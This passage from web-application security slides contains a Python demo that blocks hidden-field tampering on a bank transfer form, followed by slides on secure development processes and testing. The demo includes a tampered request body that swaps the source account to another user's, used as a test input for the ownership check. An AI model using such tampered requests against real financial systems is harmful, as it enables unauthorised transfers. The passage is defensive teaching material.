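ACCOUNT_OWNER = {
    "120199789890": "alice",
    "18822281934": "bob",
    "44797501008896675": "carol",
}
SESSIONS = {"AJPFJELCAAEFJOPKCAJFIFBM": "alice"}
SERVER_KEY = b"replace-with-a-random-key-from-config"  # assumption, demo only

# The two request bodies from slide 64.
ORIGINAL_BODY = (
    "fromAcct=120199789890&toAcct=18822281934&amount=2000.00"
    "&memo=From+HE+to+IC&Enter=Preview+Transfer"
)
TAMPERED_BODY = (
    "fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00"
    "&memo=From+HE+to+IC&Enter=Preview+Transfer"
)


def handle_transfer(session_cookie, body):
    """Authorize from the session, validate every field from the form.
    Returns ('ok', from_acct, to_acct, amount) or ('denied', reason)."""
    user = SESSIONS.get(session_cookie)
    if user is None:
        return ("denied", "no session")
    form = {k: v[0] for k, v in parse_qs(body).items()}
    from_acct = form.get("fromAcct", "")
    # The hidden field is input, not fact: check ownership against the session.
    if ACCOUNT_OWNER.get(from_acct) != user:
        return ("denied", "fromAcct not owned by session user")
    try:
        amount = Decimal(form.get("amount", ""))
    except (InvalidOperation, ValueError):
        return ("denied", "bad amount")
    if amount <= 0:
        return ("denied", "amount must be positive")
    if form.get("toAcct") not in ACCOUNT_OWNER:
        return ("denied", "unknown toAcct")
    return ("ok", from_acct, form["toAcct"], amount)


def sign_hidden(value):
    """Emit 'value|mac' for a hidden field so later edits are detectable."""
    mac = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def verify_hidden(signed):
    """Return the value if its mac matches, else None (tampered or unsigned)."""
    value, _, mac = signed.rpartition("|")
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    print(handle_transfer("AJPFJELCAAEFJOPKCAJFIFBM", ORIGINAL_BODY))
    print(handle_transfer("AJPFJELCAAEFJOPKCAJFIFBM", TAMPERED_BODY))
    token = sign_hidden("120199789890")
    print(verify_hidden(token))
    print(verify_hidden(token.replace("120199789890", "44797501008896675", 1)))
```

Note that the ownership check is what stops the slide 64 attack: the tampered body carries a perfectly well-formed account number, so format validation alone would pass it.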

SLIDE 68

PART 6: Managing and Detecting Web Application Vulnerabilities

• Building a secure development process
• Web application ROI
• Detecting web application vulnerabilities
• Managing and addressing web application security risk throughout the enterprise

SLIDE 69-71

Application Lifecycle Phases (and who is involved in each)

Design: Security Operations and Auditors
Development: Developers
Testing: QA and Developers
Production: Auditors, Dev, and Business Subject Matter Experts (SME)

SLIDE 72

Managing Web Application Security Risk

Bring security to the development team...
• Educate the development team.
• Develop and publish best practices.
• Develop secure code.
• Test and verify that code is developed securely.
• Perform routine audits of production systems.
• Establish remediation procedures.
• Keep track of security trends.

SLIDE 73

Detecting Web Application Vulnerabilities: Manual vs. Automatic Testing

Manual testing:
• Time consuming
• Expensive
• Not repeatable
• Relies on third party individuals (penetration testers)

Automatic testing:
• High performance, automated web application assessment
• Cost effective
• Scalable throughout the entire application lifecycle
• Consistent high quality assessments
• Provides economy of scale (SPI Labs)
• Customizable (Custom Agents)

SLIDE 74

Q&A: Questions?